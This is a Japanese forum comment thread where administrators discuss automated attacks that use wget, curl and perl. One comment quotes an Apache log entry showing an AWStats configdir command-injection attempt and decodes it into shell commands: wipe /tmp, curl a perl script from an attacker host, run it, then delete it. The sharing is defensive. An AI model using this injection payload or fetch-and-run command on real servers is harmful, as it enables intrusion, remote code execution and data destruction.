アカウント名:
パスワード:
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
弘法筆を選ばず、アレゲはキーボードを選ぶ -- アレゲ研究家
perlとかもあるよ (スコア:3, 参考になる)
Re:perlとかもあるよ (スコア:2, 参考になる)
cacti (これも php)の古いヴァージョンのセキュリティホール突っついて、
侵入・クラックするデモを見たときも、wget でダウンロードしてました。
手動でクラックしてるわけではなくて、
スクリプトで流し込んで実行してるから
その手のある意味、姑息な対応策も有効なんでしょうけど、
まー、本質的ではないですね。
#テクニカルサポートのエンジニアで wget とか lynx を
#知らない奴が居て、よくそれでやってるナーと感心したことがあります。
Re:perlとかもあるよ (スコア:2, 参考になる)
たとえばapacheにこんなログが。
SERVER XX.XXX.XXX.XX - - [20/Sep/2005:08:30:05 +0900] \
"GET //awstats.pl?configdir=|echo%20;cd%20/tmp;\
rm%20-rf%20*;curl%20-O%20http://www.geoXXXXXX.com\
/h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;\
echo| HTTP/1.1" 404 472
おそらくこんな感じ?
echo ;
cd /tmp;
rm -rf *;
curl -O http://www.geoXXXXXX.com/h4x000r/a.pl;
perl a.pl;
echo ;
rm -rf a.pl*;
echo |
xmrpc.php(これも毎日来てます)については良く知らないので
どなたかよろしく。
# 合わせ技らしいアタックもブログに書いたはずだけど、どこいった...
Re:perlとかもあるよ (スコア:1, 参考になる)
ぐぐると色々出てきますね。
勉強になります。
うちはawstats.plの方しか来たこと無いですけど・・・